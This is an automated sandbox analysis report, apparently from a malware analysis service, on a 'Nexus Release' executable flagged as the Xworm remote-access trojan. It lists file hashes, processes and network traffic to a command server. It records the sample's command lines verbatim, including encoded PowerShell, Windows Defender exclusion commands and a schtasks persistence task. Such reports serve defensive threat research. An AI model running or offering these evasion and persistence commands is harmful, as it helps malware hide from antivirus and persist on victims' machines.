| SHA256 | 4c2649dc69a8874b91646723aacb84c565efeaa4277c46392055bca9a10497a8 |
| SHA512 | b9c4f22dc4b52815c407ab94d18a7f2e1e4f2250aecdb2e75119150e69b006ed69f3000622ec63eabcf0886b7f56ffdb154e0bf57d8f7f45c3b1dd5c18b84ec8 |
memory/2588-1138-0x0000000007C30000-0x00000000082AA000-memory.dmp
memory/2588-1139-0x0000000006860000-0x000000000687A000-memory.dmp
memory/4616-1140-0x00000000071A0000-0x00000000071D2000-memory.dmp
memory/4616-1141-0x0000000070B50000-0x0000000070B9C000-memory.dmp
memory/4616-1151-0x00000000067B0000-0x00000000067CE000-memory.dmp
memory/4616-1152-0x00000000073E0000-0x0000000007483000-memory.dmp
memory/4428-1153-0x000001FB1FE30000-0x000001FB1FE52000-memory.dmp
memory/2588-1163-0x0000000008860000-0x0000000008E04000-memory.dmp
memory/2588-1164-0x00000000077D0000-0x0000000007862000-memory.dmp
memory/4616-1165-0x00000000075A0000-0x00000000075AA000-memory.dmp
memory/4616-1166-0x00000000077C0000-0x0000000007856000-memory.dmp
memory/4616-1167-0x0000000007730000-0x0000000007741000-memory.dmp
memory/4616-1180-0x0000000007770000-0x000000000777E000-memory.dmp
memory/4616-1190-0x0000000007780000-0x0000000007794000-memory.dmp
memory/4616-1191-0x0000000007860000-0x000000000787A000-memory.dmp
memory/4616-1193-0x00000000077B0000-0x00000000077B8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 797922be06f08802cceb035fbdd73135 |
| SHA1 | 7f4c908be0a5b8a1afd2d80a769a44dd933e5c1f |
| SHA256 | 5c0f6f17e29d51847d715d9c1fd91edf1d04847184681e13ac2611f5bc1a3c72 |
| SHA512 | 4ac07dac164c9bed986360dbfbf9cf99e9a5a87de2434c53541dbb96f120b539901753e7f0a45b49bea9ff730abd67ba501b18ac606a985501da2d5e6f1fbd44 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\59888351-9f26-4666-9a67-ec0352ad4771
| MD5 | d2c4841ca759d6621851f1fa1dded68d |
| SHA1 | 9bf343a1554ed651c069a8b321f82a5014fd8beb |
| SHA256 | 6bdfc34a711a79a90ac07466d41af0db8e5a0d1f0adcb1e8af7f544f2796c9a7 |
| SHA512 | 7cbe5002a31c589660d8f5cf48170c9de337363395b3cf1dfd755e3a983ca3f2e4a9e243a26d404e1019e5daa2609f70213485ce04c9cb608ba4a1b7868bce5f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\74e2ea74-f85a-46b1-afaf-46385da63e7b
| MD5 | ca68caa0835d12f3ea1564547523655a |
| SHA1 | 7b84765e4f4cc4ac2b8d3bad2ffc488fd6be4f8d |
| SHA256 | 67fc9b778abfa11d98107f38cfa65b297eb26d9db1035cff419a4caf2c872e72 |
| SHA512 | 309a6107ee296e0dd77dbe7e42fc365804bcf0f8b30ce68091cfbe8f4607de273867d6b41f24df39688a649277d40c13c718e17eaa2826f7ed4cb35609a72f15 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js
| MD5 | 4cf8c9f2f7b551c0a70cbc2efb30233f |
| SHA1 | 89d79ec34a9232131a1774bfe50c3f168b385267 |
| SHA256 | 6e7d7ae2a48fc74fec4017b5b3097a10a72512872b6e413f370e1c21a0567096 |
| SHA512 | e592eabfff65070752e98738e4a8aa5f106e74b4ff8e4b0c4b93a766b9676faa090197a8c22c32bdf2055f917ac14227c777b389257556d3c5ff72cccf004e34 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | a824b6183f387c83f5cf5ae16aa4c1d7 |
| SHA1 | 89ee5c34f35e21b33e6e0af604ccf45fb8c99e38 |
| SHA256 | f734c2d2740c4ca99d2915e110402ba206dd092a52f9e1e0a929c57cf435397d |
| SHA512 | a7582f489068d20e694e0e2bd34c902c50bfddfed79d75a1ff8759dd046896f1bf192e891f158b67990b606c47950ae5214a5ada1d32657fafefc881c121036e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 72cc1ca4efbf2fa117f39b766542e130 |
| SHA1 | bde456aa2589e2b21895a2fcb87bbed2b1997714 |
| SHA256 | fc831dd0705be5dd2602f3116e0c9d4effabe48c745210af031b1e4636744de0 |
| SHA512 | 51a041f2e917373b822c2a22276d2cf7f6731194f7265b10a4a7cdd0555eef9c2fc23629d77c6a1f4fef065f34926ac426f53cdf94b19372f8da0484cba138b5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js
| MD5 | f90c69d4717cfc81509815c74b81c610 |
| SHA1 | de6d0dbc44d8a28e72882675277ec3df990d6c39 |
| SHA256 | b4d3c519dacd10e5319f9c488e5bacf5a36bf35d96a8e6fda0d9d25097aee791 |
| SHA512 | 576fb060425cc03964e14ba5de9580d1e42c11a36711c81fd09d50bd7ede88835f64c0c836d91c68cc5b4b71f034fbc11fbbc17b6023d9c592ea259be5a45f51 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | bd64d25001a65a866ae8235695a35461 |
| SHA1 | fe580d1166e44ec25149f9e527bf4dddbc0c000e |
| SHA256 | e1b8535aa67ce7fb569364b43705c5182bbda800fec09a4e4dfe71dacf1ec6ea |
| SHA512 | 2320f6373e1afe06c83c33a9843fcd6e036090c53d5c9b96af09a7faa930d1e733cbdbec6eb6dc1b3b36ba6df08ad1d593bd824dc107cc6eb3513c046a516d18 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js
| MD5 | e3bdaae1726b4ee07c5916aa326abc50 |
| SHA1 | 7f5054e482db0ae0eb5e1db746e7f4e9799ff2b8 |
| SHA256 | 0c0f706fe0a67435c156cef42133eb42ec5f32ad5d8b2d912f3fba3faf5461af |
| SHA512 | fd71d5307b76aa55edd726d5ea1a67223b8fe84b576d7fd81b7dcff61f4c4fe2d4782ab03c0965ccb1c647f5cc67a7ca4ab07709ca1a1ebb6db65f3cdd06693d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | f04511913d0a129652ba436315b09c4b |
| SHA1 | 5871a9fe02115a5a2287176bba49193a59e0e287 |
| SHA256 | b5df17cf12302b99fd405241d64f606eabc62ace710e8306931df2c27cbcdbf7 |
| SHA512 | 43bd73bb2350f311314344d28c67639f3c642b81bcec28301591b80086dbd54d9f28fb003af5dbddebaaa6e4c3c9ad7293f3da292044ec55e3d09cea891eae3d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 3106089a6dd7cd45ac1f126eb3db97e3 |
| SHA1 | f613142ca8772cc34d940ba88c5c5094c9097947 |
| SHA256 | 3f67c498ce3fc1bee01523d350c3a47b7b892c22a545048b866953e158c94a9b |
| SHA512 | 443b6c10bc265e1a212008e1713fdaad8b584c14cfd0196e9fcee61cfaba073f1c39a3f59beb025063cd4b8b702b9b66f4ed0550dfb22b731cc3b0369694b29e |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\97E21079D4338ED644D10F3CF8B6CCFD6F24DA5D
| MD5 | 64e2011d92455b4f4dd4948fed8c12c9 |
| SHA1 | 7aee6f65da14118b4b267f396edf0854c6d4d6e3 |
| SHA256 | 7c2cbdb6884fa92f7a8baf0a6c8b555d1939a9704f1c286ed25f320ae3415c93 |
| SHA512 | 5428aa7292c29dd5ac812e5d7e024aeaafca5b493a32bf968f5f72c1d65ff419132c4a0fd0998853de6ad4af943bde43aca7c617b107a0a22e44abde7996ec87 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore.jsonlz4
| MD5 | cc1d3393c9d06ab078fd28cb4bbfce17 |
| SHA1 | 14972870dd983dbfea0693933f499115ee663b7d |
| SHA256 | 58694412d85a076bfad6f1e59b3ff388c13ac81f005b3005afc29f17b052d0c2 |
| SHA512 | d69353a8e8318cf2cf4cc3a18f915c18e778f53e3a2258b170a47ce59c9fdf6df90d9eefe2fa4f24577468380af936243686a4120aa93f43f5c42a904f66c691 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win7-20240508-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\Nexus Release\license.txt"
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win7-20240508-en
Max time kernel
146s
Max time network
134s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2708_133626012089468000\nexus.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2708_133626012089468000\nexus.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.5.exe
"C:\Users\Admin\AppData\Local\Temp\Nexus Release\Nexus Release V1.5.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAbABkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBuAGUAeAB1AHMAbABvAGEAZABlAHIAIABSAHUAbgAgAEEAcwAgAEEAZABtAGkAbgAgAEkAZgAgAEkAbgBqAGUAYwB0AGkAbwBuACAARgBhAGkAbABzACcALAAnACcALAAnAE8ASwAnACwAJwBXAGEAcgBuAGkAbgBnACcAKQA8ACMAdwBmAGMAIwA+AA=="
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcwB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAbABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBlACMAPgA="
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Local\dllhost.exe
"C:\Users\Admin\AppData\Local\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2708_133626012089468000\nexus.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {90F9AB62-5CC4-400B-A5EC-7B770F868144} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp | |
| NL | 91.92.241.69:5555 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UROZ6ODLQB5IL4HTKQDZ.temp
| MD5 | 4b9def1adb2421d8c27dc9b2ae3cea0e |
| SHA1 | cf3e9ac2a0b28d8a8150f77c89ae3e336ca5759f |
| SHA256 | 706fd5e2042798e05132c8cf6a5e144890719a660d4f76e7a403eab3aeb67ac5 |
| SHA512 | c89ed29d9db96fb8b6a145884708e5d18f7c265d685b0ff5075008ce03401186d0c91f233aa7f87df4d4cd22bc7ca8d42d86cefaced16dc3be51b3204f62b993 |
\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | 28fdeaf0607d576de1b00981421e03c8 |
| SHA1 | 71cad5e001a788429639eb721585a5cafbff488b |
| SHA256 | bad905acaa547a246c37c06b39f0d6f473489a6a1900245548a6341a87bb8a77 |
| SHA512 | 915e9867450c4cd78ec42a779f4a53e86e4645a0c6f65a37d6818d086db2bc90afb116786a53daf041277eede1920053d083d548d6ba33314abf095887792bb0 |
C:\Users\Admin\AppData\Local\dllhost.exe
| MD5 | cc7686bf7c7d81f59196d5cc3cab3348 |
| SHA1 | ac39079f223f87d404c421c48239f913b12f00a8 |
| SHA256 | 49c175257966f191a2abce16d8533d359fc27ecf6512da870a9c59937914d5f7 |
| SHA512 | 940cfb37c1f5e5dbd86cc14d5a0a85dfaf889754051d4fc0d0afbe7bedceaec91b5f36b873b5e24cd081432db1b7d61df72a198681b9ab8e3a9b57197cfb58ae |
memory/2748-43-0x0000000000030000-0x0000000000048000-memory.dmp
\Users\Admin\AppData\Local\Temp\onefile_2708_133626012089468000\python310.dll
| MD5 | 384349987b60775d6fc3a6d202c3e1bd |
| SHA1 | 701cb80c55f859ad4a31c53aa744a00d61e467e5 |
| SHA256 | f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8 |
| SHA512 | 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5 |
C:\Users\Admin\AppData\Local\Temp\onefile_2708_133626012089468000\nexus.exe
| MD5 | a7940c3b4fa027664ab5c18bc794bf36 |
| SHA1 | b7a678427915eeb55b9da86c057a7fd3d61bdd15 |
| SHA256 | 41f7a63a0f786d751c009fe4b06b7c8755a7aaaf82a252da6878e0a1b967608d |
| SHA512 | 30fcc79f07123ac078177a69dc1ae4146934ae6f60e4317ac1183058da26bf69fbf23a4d5d5b1e788253ddfcbd0b8c932a4a41f47d78f8407bc4a14627e9fb1c |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2280-2077-0x000000001B5B0000-0x000000001B892000-memory.dmp
memory/2280-2078-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | db377c058c78675106c2b95f464dd61c |
| SHA1 | 70bf5e86b35d40a2aac5de4cb095d6474c9dee64 |
| SHA256 | 3e44dee44832a03ecbae0eaee1b7362192e524f0391ea5717cb32388963f6e37 |
| SHA512 | bf1e85f5fd4d83a1a683a8469e5f92957e7be5a57617e90ff28898e3588e6029785ac93a1f2dca954c6a88461bed4d8b2ff1689e05b84b35e5191bedf178c524 |
memory/2724-2084-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
memory/2724-2085-0x0000000001E00000-0x0000000001E08000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-11 17:39
Reported
2024-06-11 17:42
Platform
win7-20240215-en
Max time kernel
121s
Max time network
123s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Nexus Release\assets.dll",#1